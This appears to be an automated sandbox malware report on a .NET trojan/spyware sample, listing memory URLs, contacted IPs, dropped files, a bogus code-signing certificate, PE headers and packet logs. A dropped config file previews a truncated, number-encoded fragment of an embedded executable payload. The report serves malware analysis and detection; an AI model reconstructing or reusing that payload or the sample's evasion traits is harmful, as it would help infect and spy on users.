              Name | Malicious | Antivirus Detection | Reputation
              http://www.liverpoolfc.com/ | false | | high

              URLs from Memory and Binaries

                                                                                                                                        high
                                                                                                                                        http://www.liverpoolfc.com/legal/cookiese0YQRfcpqS.exe, 00000000.00000003.251645745.0000000004755000.00000004.00000001.sdmpfalse
                                                                                                                                          high
                                                                                                                                          https://d3j2s6hdd6a7rg.cloudfront.net/v2/JE-552/lfc/js/scripts.min.jse0YQRfcpqS.exe, 00000000.00000003.251645745.0000000004755000.00000004.00000001.sdmpfalse
                                                                                                                                            high
                                                                                                                                            https://d3j2s6hdd6a7rg.cloudfront.net/v2/uploads/media/partnerlogo/0002/13/thumb_112272_partnerlogo_e0YQRfcpqS.exe, 00000000.00000003.251645745.0000000004755000.00000004.00000001.sdmpfalse
                                                                                                                                              high
                                                                                                                                              https://www.manutd.com/en/Help/Accessibilitye0YQRfcpqS.exe, 00000000.00000002.272855563.00000000033C2000.00000004.00000001.sdmpfalse
                                                                                                                                                high
                                                                                                                                                https://www.tourism-mauritius.mue0YQRfcpqS.exe, 00000000.00000003.251645745.0000000004755000.00000004.00000001.sdmpfalse
                                                                                                                                                  high
                                                                                                                                                  https://www.youtube.com/manutde0YQRfcpqS.exe, 00000000.00000002.272855563.00000000033C2000.00000004.00000001.sdmpfalse
                                                                                                                                                    high
                                                                                                                                                    http://www.liverpoolfc.com/corporate/rss-feedse0YQRfcpqS.exe, 00000000.00000003.251645745.0000000004755000.00000004.00000001.sdmpfalse
                                                                                                                                                      high
                                                                                                                                                      https://d3j2s6hdd6a7rg.cloudfront.net/v2/uploads/media/partnerlogo/0002/18/thumb_117132_partnerlogo_e0YQRfcpqS.exe, 00000000.00000003.251645745.0000000004755000.00000004.00000001.sdmpfalse
                                                                                                                                                        high
                                                                                                                                                        http://crt.rootg2.amazontrust.com/rootg2.cer0=e0YQRfcpqS.exe, 00000000.00000002.279005900.00000000063FD000.00000004.00000001.sdmpfalse
                                                                                                                                                        • URL Reputation: safe
                                                                                                                                                        • URL Reputation: safe
                                                                                                                                                        • URL Reputation: safe
                                                                                                                                                        unknown
                                                                                                                                                        http://ip-api.com/jsone0YQRfcpqS.exefalse
                                                                                                                                                          high
                                                                                                                                                          https://d3j2s6hdd6a7rg.cloudfront.net/v2/JE-552/lfc/js/home-scripts.min.jse0YQRfcpqS.exe, 00000000.00000003.251645745.0000000004755000.00000004.00000001.sdmpfalse
                                                                                                                                                            high
                                                                                                                                                            http://www.liverpoolfc.com/corporate/anti-slaverye0YQRfcpqS.exe, 00000000.00000003.251645745.0000000004755000.00000004.00000001.sdmpfalse
                                                                                                                                                              high
                                                                                                                                                              http://www.realmadrid.com/fre0YQRfcpqS.exe, 00000000.00000002.272855563.00000000033C2000.00000004.00000001.sdmpfalse
                                                                                                                                                                high
                                                                                                                                                                http://instagram.com/manchesterunitede0YQRfcpqS.exe, 00000000.00000002.272855563.00000000033C2000.00000004.00000001.sdmpfalse
                                                                                                                                                                  high
                                                                                                                                                                  https://sdk.privacy-center.org/loader.jse0YQRfcpqS.exe, 00000000.00000002.272855563.00000000033C2000.00000004.00000001.sdmpfalse
                                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                                  unknown
                                                                                                                                                                  https://www.manutd.com/en/partners/global/swissquotee0YQRfcpqS.exe, 00000000.00000002.272855563.00000000033C2000.00000004.00000001.sdmpfalse
                                                                                                                                                                    high
                                                                                                                                                                    https://www.manutd.com/en/Help/Privacy-Policye0YQRfcpqS.exe, 00000000.00000002.272855563.00000000033C2000.00000004.00000001.sdmpfalse
                                                                                                                                                                      high
                                                                                                                                                                      https://www.manutd.com/en/partners/global/marriott-hotelse0YQRfcpqS.exe, 00000000.00000002.272855563.00000000033C2000.00000004.00000001.sdmpfalse
                                                                                                                                                                        high
                                                                                                                                                                        http://www.liverpoolfc.com4e0YQRfcpqS.exe, 00000000.00000002.272867530.00000000033CD000.00000004.00000001.sdmpfalse
                                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                                        unknown
                                                                                                                                                                        http://www.mancity.com/base/uIJBEuhZwHfuEruqtWZLYlYmKZhrCgYNpCevGEPixchHNslePakqGiwLoUJiSfYvRcRmYpuVe0YQRfcpqS.exe, 00000000.00000002.272749215.0000000003361000.00000004.00000001.sdmpfalse
                                                                                                                                                                          high
                                                                                                                                                                          https://pubads.g.doubleclick.net/gampad/ads?sz=640x480&iu=/e0YQRfcpqS.exe, 00000000.00000002.272855563.00000000033C2000.00000004.00000001.sdmpfalse
                                                                                                                                                                            high
                                                                                                                                                                            https://uk.joiebaby.com/liverpoolfc/e0YQRfcpqS.exe, 00000000.00000003.251645745.0000000004755000.00000004.00000001.sdmpfalse
                                                                                                                                                                              high
                                                                                                                                                                              http://www.liverpoolfc.com/corporate/browser-supporte0YQRfcpqS.exe, 00000000.00000003.251645745.0000000004755000.00000004.00000001.sdmpfalse
                                                                                                                                                                                high
                                                                                                                                                                                http://www.realmadrid.com/ene0YQRfcpqS.exe, 00000000.00000002.272855563.00000000033C2000.00000004.00000001.sdmpfalse
                                                                                                                                                                                  high
                                                                                                                                                                                  https://d3j2s6hdd6a7rg.cloudfront.net/v2/uploads/media/partnerlogo/0001/74/thumb_73714_partnerlogo_pe0YQRfcpqS.exe, 00000000.00000003.251645745.0000000004755000.00000004.00000001.sdmpfalse
                                                                                                                                                                                    high
                                                                                                                                                                                    http://www.liverpoolfc.com/contactuse0YQRfcpqS.exe, 00000000.00000003.251645745.0000000004755000.00000004.00000001.sdmpfalse
                                                                                                                                                                                      high
                                                                                                                                                                                      http://0k10dk21kkeok2e.online4e0YQRfcpqS.exe, 00000000.00000002.272867530.00000000033CD000.00000004.00000001.sdmpfalse
                                                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                                                      unknown
                                                                                                                                                                                      https://d3j2s6hdd6a7rg.cloudfront.net/v2/uploads/media/partnerlogo/0001/78/thumb_77004_partnerlogo_pe0YQRfcpqS.exe, 00000000.00000003.251645745.0000000004755000.00000004.00000001.sdmpfalse
                                                                                                                                                                                        high
                                                                                                                                                                                        http://s.ss2.us/r.crl0e0YQRfcpqS.exe, 00000000.00000002.279005900.00000000063FD000.00000004.00000001.sdmpfalse
                                                                                                                                                                                        • URL Reputation: safe
                                                                                                                                                                                        • URL Reputation: safe
                                                                                                                                                                                        • URL Reputation: safe
                                                                                                                                                                                        unknown
                                                                                                                                                                                        https://d3j2s6hdd6a7rg.cloudfront.net/v2/uploads/media/partnerlogo/0001/92/thumb_91236_partnerlogo_pe0YQRfcpqS.exe, 00000000.00000003.251645745.0000000004755000.00000004.00000001.sdmpfalse
                                                                                                                                                                                          high
                                                                                                                                                                                          http://crl3.digicert.ce0YQRfcpqS.exe, 00000000.00000002.279005900.00000000063FD000.00000004.00000001.sdmpfalse
                                                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                                                          unknown
                                                                                                                                                                                          https://www.liverpoolfc.comHe0YQRfcpqS.exe, 00000000.00000002.272888358.00000000033F2000.00000004.00000001.sdmpfalse
                                                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                                                          unknown
                                                                                                                                                                                          https://www.manutd.com/e0YQRfcpqS.exe, 00000000.00000002.272813491.0000000003396000.00000004.00000001.sdmpfalse
                                                                                                                                                                                            high

                                                                                                                                                                                            Contacted IPs

                                                                                                                                                                                            Public

IP | Domain | Country | ASN | ASN Name | Malicious
151.101.2.133 | unknown | United States | 54113 | FASTLYUS | false
99.86.159.34 | unknown | United States | 16509 | AMAZON-02US | false
99.86.159.103 | unknown | United States | 16509 | AMAZON-02US | false
172.67.179.188 | unknown | United States | 13335 | CLOUDFLARENETUS | false

General Information

Joe Sandbox Version: 31.0.0 Emerald
Analysis ID: 361333
Start date: 02.03.2021
Start time: 20:34:57
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 6m 37s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: e0YQRfcpqS.exe
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed: 26
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal92.troj.spyw.winEXE@3/4@23/4
EGA Information: Failed
HDC Information:
• Successful, ratio: 17.3% (good quality ratio 16.8%)
• Quality average: 79.3%
• Quality standard deviation: 28.8%
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 45
• Number of non-executed functions: 53
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .exe
Warnings:
                                                                                                                                                                                            • Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe
• Excluded IPs from analysis (whitelisted)
• Excluded domains from analysis (whitelisted)
                                                                                                                                                                                            • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                                                                                                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                            • VT rate limit hit for: /opt/package/joesandbox/database/analysis/361333/sample/e0YQRfcpqS.exe

                                                                                                                                                                                            Simulations

                                                                                                                                                                                            Behavior and APIs

Time | Type | Description
20:35:48 | API Interceptor | 2x Sleep call for process: e0YQRfcpqS.exe modified

                                                                                                                                                                                            Joe Sandbox View / Context

                                                                                                                                                                                            IPs


                                                                                                                                                                                            Domains


                                                                                                                                                                                            ASN

                                                                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext

JA3 Fingerprints

Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context
                                                                                                                                                                                            • 99.86.159.103
                                                                                                                                                                                            file000852021.exeGet hashmaliciousBrowse
                                                                                                                                                                                            • 99.86.159.103

                                                                                                                                                                                            Dropped Files

                                                                                                                                                                                            No context

                                                                                                                                                                                            Created / dropped Files

                                                                                                                                                                                            C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
                                                                                                                                                                                            Process:C:\Users\user\Desktop\e0YQRfcpqS.exe
                                                                                                                                                                                            File Type:Microsoft Cabinet archive data, 55578 bytes, 1 file
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):55578
                                                                                                                                                                                            Entropy (8bit):7.995342925763736
                                                                                                                                                                                            Encrypted:true
                                                                                                                                                                                            SSDEEP:1536:BeQysAgNjwGLn31DsKaOvP3TQ5IhHnQl1GH:84jwGb1IKaOXjVFnQl1GH
                                                                                                                                                                                            MD5:5C76CB48C81E1E013E0FD70132B0B861
                                                                                                                                                                                            SHA1:14ADD82B9C667EAF75E1EB4D02E0AF7EDD166DD5
                                                                                                                                                                                            SHA-256:68158977F401D13973F19AC7C2CF21F74FF60BF1405BF8627C88B51C9B8A6BE5
                                                                                                                                                                                            SHA-512:EAA90CAD25827CC83852A756C1806BE2E5AA05DCADA28ED6B2ED3690DE42F5398B251537AA973DD28563F60828E8A0E114AEB81E09E1644D5D9F0511DF7E37BE
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
                                                                                                                                                                                            Process:C:\Users\user\Desktop\e0YQRfcpqS.exe
                                                                                                                                                                                            File Type:data
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):328
                                                                                                                                                                                            Entropy (8bit):3.1318210879570407
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:6:kK1QVk36K+N+SkQlPlEGYRMY9z+4KlDA3RUeAODX:2GBNkPlE99SNxAhUeAOL
                                                                                                                                                                                            MD5:43E89FAF7C23C56316CFD66AE91C78CD
                                                                                                                                                                                            SHA1:B28078771787E9C427557B74FF950DB9CA8AF802
                                                                                                                                                                                            SHA-256:F2E7B5E56F1A4884F349E24768F9278F8769FF5B6468079390A8415E89E0C8A7
                                                                                                                                                                                            SHA-512:343D260B83C5BE146A1A98645CA73803B14CBADBBA75AEE71509E856A1FD89295BC458F31581675E1535D3B45158D344B1675ABF9615BA0532A38977F5D02536
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            Preview: p...... ...............(....................................................... ..........a!.......&...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".8.0.d.3.1.9.6.1.2.1.a.d.7.1.:.0."...
                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\e0YQRfcpqS.exe.log
                                                                                                                                                                                            Process:C:\Users\user\Desktop\e0YQRfcpqS.exe
                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                            Category:modified
                                                                                                                                                                                            Size (bytes):1216
                                                                                                                                                                                            Entropy (8bit):5.355304211458859
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4x84j:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzr
                                                                                                                                                                                            MD5:FED34146BF2F2FA59DCF8702FCC8232E
                                                                                                                                                                                            SHA1:B03BFEA175989D989850CF06FE5E7BBF56EAA00A
                                                                                                                                                                                            SHA-256:123BE4E3590609A008E85501243AF5BC53FA0C26C82A92881B8879524F8C0D5C
                                                                                                                                                                                            SHA-512:1CC89F2ED1DBD70628FA1DC41A32BA0BFA3E81EAE1A1CF3C5F6A48F2DA0BF1F21A5001B8A18B04043C5B8FE4FBE663068D86AA8C4BD8E17933F75687C3178FF6
                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                            Reputation:high, very likely benign file
                                                                                                                                                                                            Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21
                                                                                                                                                                                            C:\Users\user\AppData\Local\gLCtQBLkJiklhuQmKxvHxPdgE\e0YQRfcpqS.exe_Url_0tjnbr1lnyahqnr3ds44zzobpcvvbkgw\7.572.261.222\bnjt21d2.newcfg
                                                                                                                                                                                            Process:C:\Users\user\Desktop\e0YQRfcpqS.exe
                                                                                                                                                                                            File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):497854
                                                                                                                                                                                            Entropy (8bit):3.123976368826284
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:6144:AdRa7VWopyzhfD3O06pkexoLX+b4ZoPIS+UIMKc:AdWcopyzhfD3OnpkgoXBHxc
                                                                                                                                                                                            MD5:2D03412E58A34A8A077BB11708B7EBBF
                                                                                                                                                                                            SHA1:25ED45E5B7C92CD2AC5EFAA73D18234EEDD6CD45
                                                                                                                                                                                            SHA-256:3E8E087F8BFA35782778892E5E1208E9B28517CA3DE3F4A268E6AB6DEABB7D4D
                                                                                                                                                                                            SHA-512:828B4E57C59BA96183387FE8165E39E8241CCA68B309B8CB276EE90653F72EC6B6C5B2A1BECE71B25FD58CE0E118A15E3ECAF2D81AE4592FC3675A262558BEDE
                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            Preview: <?xml version="1.0" encoding="utf-8"?>..<configuration>.. <configSections>.. <sectionGroup name="userSettings" type="System.Configuration.UserSettingsGroup, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" >.. <section name="gLCtQBLkJiklhuQmKxvHxPdgEFgVycNxLDshWIxwlH.NEpIPiYBWKYUvhUfgv" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" allowExeDefinition="MachineToLocalUser" requirePermission="false" />.. </sectionGroup>.. </configSections>.. <userSettings>.. <gLCtQBLkJiklhuQmKxvHxPdgEFgVycNxLDshWIxwlH.NEpIPiYBWKYUvhUfgv>.. <setting name="FgmnRDuHYDQPWTkEmcdAueaHPIluEp" serializeAs="String">.. <value>77P90P144P0P3P0P0P0P4P0P0P0P255P255P0P0P184P0P0P0P0P0P0P0P64P0P0P0P0P0P0P0P0P0P0P0P0P0P0P0P0P0P0P0P0P0P0P0P0P0P0P0P0P0P0P0P0P0P0P0P128P0P0P0P14P31P186P14P0P180P9P205P33P184P1P76P205P33P84P104P105P115P32P112P114P111P103P114P9

                                                                                                                                                                                            Static File Info

                                                                                                                                                                                            General

                                                                                                                                                                                            File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                            Entropy (8bit):6.073009850057018
                                                                                                                                                                                            TrID:
                                                                                                                                                                                            • Win32 Executable (generic) Net Framework (10011505/4) 49.98%
                                                                                                                                                                                            • Win32 Executable (generic) a (10002005/4) 49.93%
                                                                                                                                                                                            • Windows Screen Saver (13104/52) 0.07%
                                                                                                                                                                                            • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                                                                                                            • DOS Executable Generic (2002/1) 0.01%
                                                                                                                                                                                            File name:e0YQRfcpqS.exe
                                                                                                                                                                                            File size:17744
                                                                                                                                                                                            MD5:936100c988a1cada3c86b057c019d1f0
                                                                                                                                                                                            SHA1:a93fc4ca21d28e38c9e225da081a7a7879457d8e
                                                                                                                                                                                            SHA256:2fff4895961b88cecf01af71e7d7ad3b3c2359332a5501444310350aefd81748
                                                                                                                                                                                            SHA512:a29cee095e6a518a09665405707de225d05b75191d8275b3444ed58c0b8027c671fd69bcbca1882236045e68f35a0a8f62d88f07b6d9d78f177cb501bd748d72
                                                                                                                                                                                            SSDEEP:384:++uVeFHzY8xULh+cSz1mQa+0SCAlqyzNBxN6ndEWb6ghi:+eFHZ+LEz0K086ndEW2ghi
                                                                                                                                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...yX............"...0..(...........G... ...`....@.. ..............................).....@................................

                                                                                                                                                                                            File Icon

                                                                                                                                                                                            Icon Hash:00828e8e8686b000

                                                                                                                                                                                            Static PE Info

                                                                                                                                                                                            General

                                                                                                                                                                                            Entrypoint:0x4047ee
                                                                                                                                                                                            Entrypoint Section:.text
                                                                                                                                                                                            Digitally signed:true
                                                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                                                            Subsystem:windows gui
                                                                                                                                                                                            Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                                                                                                                            DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                                                                                                                                                            Time Stamp:0xFABC5879 [Sun Apr 22 01:10:17 2103 UTC]
                                                                                                                                                                                            TLS Callbacks:
                                                                                                                                                                                            CLR (.Net) Version:v4.0.30319
                                                                                                                                                                                            OS Version Major:4
                                                                                                                                                                                            OS Version Minor:0
                                                                                                                                                                                            File Version Major:4
                                                                                                                                                                                            File Version Minor:0
                                                                                                                                                                                            Subsystem Version Major:4
                                                                                                                                                                                            Subsystem Version Minor:0
                                                                                                                                                                                            Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                                                                                                                            Authenticode Signature

                                                                                                                                                                                            Signature Valid:false
                                                                                                                                                                                            Signature Issuer:C=jcOjXMwIFjiNFpBIcumNahFaQfcEzHApExwtwrtCeIB, S=zdnOKprLBoqofKAUQEsDOrqHziGpqoAqhAKJONaTVobL, L=UpiPdBMjRBrqzjMbCKimZCZAqUxSCajY, T=TpnDfwhzYrTVQiVAPJOVqBYNutvEOQeUsQIEFUmWtpAPO, E=BRgJBTystAOzgIQgqKEqwXNS, OU=fbfwkzMpsh, O=woDmXCXGFYuSGbzYEyfjYUuJNFjwRfSLczKOunbhw, CN=DKBzARLWliRJthgcXzZKtMGeQdgNOrLZXqH
                                                                                                                                                                                            Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                                                                                                                                                                                            Error Number:-2146762487
Not Before:3/1/2021 9:44:04 PM
Not After:3/1/2022 9:44:04 PM
                                                                                                                                                                                            Subject Chain
                                                                                                                                                                                            • C=jcOjXMwIFjiNFpBIcumNahFaQfcEzHApExwtwrtCeIB, S=zdnOKprLBoqofKAUQEsDOrqHziGpqoAqhAKJONaTVobL, L=UpiPdBMjRBrqzjMbCKimZCZAqUxSCajY, T=TpnDfwhzYrTVQiVAPJOVqBYNutvEOQeUsQIEFUmWtpAPO, E=BRgJBTystAOzgIQgqKEqwXNS, OU=fbfwkzMpsh, O=woDmXCXGFYuSGbzYEyfjYUuJNFjwRfSLczKOunbhw, CN=DKBzARLWliRJthgcXzZKtMGeQdgNOrLZXqH
                                                                                                                                                                                            Version:3
                                                                                                                                                                                            Thumbprint MD5:5391C8DEF46C8F63625F08E1DB70F3E1
                                                                                                                                                                                            Thumbprint SHA-1:015665A3DCD49018B2EE3E4FAB84F62721C8B4AC
                                                                                                                                                                                            Thumbprint SHA-256:48EFEF71929E30BE9D41E8F8FC5092D1A6D753E9F97016CB7906E7561CB4FF94
                                                                                                                                                                                            Serial:6A71FDCE2644C952C07FAEC52BA819C6

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al

Data Directories

Name                                  Virtual Address  Virtual Size  Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
IMAGE_DIRECTORY_ENTRY_IMPORT          0x4794           0x57          .text
IMAGE_DIRECTORY_ENTRY_RESOURCE        0x6000           0x3fc         .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
IMAGE_DIRECTORY_ENTRY_SECURITY        0x3000           0x1550        .text
IMAGE_DIRECTORY_ENTRY_BASERELOC       0x8000           0xc           .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG           0x0              0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_IAT             0x2000           0x8           .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x2008           0x48          .text
IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0

Sections

Name    Virtual Address  Virtual Size  Raw Size  Xored PE  ZLIB Complexity  File Type  Entropy          Characteristics
.text   0x2000           0x27f4        0x2800    False     0.5298828125     data       5.53835973322    IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rsrc   0x6000           0x3fc         0x400     False     0.4541015625     data       3.35569657372    IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc  0x8000           0xc           0x200     False     0.044921875      data       0.0815394123432  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name        RVA     Size   Type  Language  Country
RT_VERSION  0x6058  0x3a4  data  English   United States

Imports

DLL          Import
mscoree.dll  _CorExeMain

Version Infos

Description       Data
LegalCopyright    2015 computeCurrentBogusState
Assembly Version  8.2.0.5
InternalName      SmtpSection.exe
FileVersion       0.2.0.5
CompanyName       get_DataGridSelection
LegalTrademarks   SHA256Cng
Comments          WriteAsync
ProductName       SmtpSection
ProductVersion    8.2.0.5
FileDescription   get_AutoScrollMargin
OriginalFilename  SmtpSection.exe
Translation       0x0409 0x0514

                                                                                                                                                                                            Possible Origin

Language of compilation system: English
Country where language is spoken: United States

                                                                                                                                                                                            Network Behavior

                                                                                                                                                                                            Network Port Distribution

                                                                                                                                                                                            TCP Packets

                                                                                                                                                                                            Mar 2, 2021 20:35:53.895109892 CET8049720172.67.179.188192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:35:53.895148039 CET8049720172.67.179.188192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:35:53.895237923 CET4972080192.168.2.5172.67.179.188
                                                                                                                                                                                            Mar 2, 2021 20:35:53.896270990 CET8049720172.67.179.188192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:35:53.896312952 CET8049720172.67.179.188192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:35:53.896380901 CET4972080192.168.2.5172.67.179.188
                                                                                                                                                                                            Mar 2, 2021 20:35:53.897377968 CET8049720172.67.179.188192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:35:53.897442102 CET8049720172.67.179.188192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:35:53.897686958 CET4972080192.168.2.5172.67.179.188
                                                                                                                                                                                            Mar 2, 2021 20:35:53.898502111 CET8049720172.67.179.188192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:35:53.898538113 CET8049720172.67.179.188192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:35:53.898591995 CET4972080192.168.2.5172.67.179.188
                                                                                                                                                                                            Mar 2, 2021 20:35:53.915446997 CET8049720172.67.179.188192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:35:53.915493965 CET8049720172.67.179.188192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:35:53.915553093 CET4972080192.168.2.5172.67.179.188
                                                                                                                                                                                            Mar 2, 2021 20:35:53.916820049 CET8049720172.67.179.188192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:35:53.916857004 CET8049720172.67.179.188192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:35:53.916941881 CET4972080192.168.2.5172.67.179.188
                                                                                                                                                                                            Mar 2, 2021 20:35:53.917341948 CET8049720172.67.179.188192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:35:53.917375088 CET8049720172.67.179.188192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:35:53.917447090 CET4972080192.168.2.5172.67.179.188
                                                                                                                                                                                            Mar 2, 2021 20:35:53.918632984 CET8049720172.67.179.188192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:35:53.918665886 CET8049720172.67.179.188192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:35:53.918761015 CET4972080192.168.2.5172.67.179.188
                                                                                                                                                                                            Mar 2, 2021 20:35:53.920083046 CET8049720172.67.179.188192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:35:53.920118093 CET8049720172.67.179.188192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:35:53.920196056 CET4972080192.168.2.5172.67.179.188
                                                                                                                                                                                            Mar 2, 2021 20:35:53.920747995 CET8049720172.67.179.188192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:35:53.920782089 CET8049720172.67.179.188192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:35:53.920892954 CET4972080192.168.2.5172.67.179.188
                                                                                                                                                                                            Mar 2, 2021 20:35:53.922056913 CET8049720172.67.179.188192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:35:53.922086000 CET8049720172.67.179.188192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:35:53.922295094 CET4972080192.168.2.5172.67.179.188
                                                                                                                                                                                            Mar 2, 2021 20:35:53.949858904 CET8049720172.67.179.188192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:35:53.949898958 CET8049720172.67.179.188192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:35:53.950043917 CET4972080192.168.2.5172.67.179.188
                                                                                                                                                                                            Mar 2, 2021 20:35:53.950258970 CET8049720172.67.179.188192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:35:53.950285912 CET8049720172.67.179.188192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:35:53.950448990 CET4972080192.168.2.5172.67.179.188
                                                                                                                                                                                            Mar 2, 2021 20:35:53.951396942 CET8049720172.67.179.188192.168.2.5
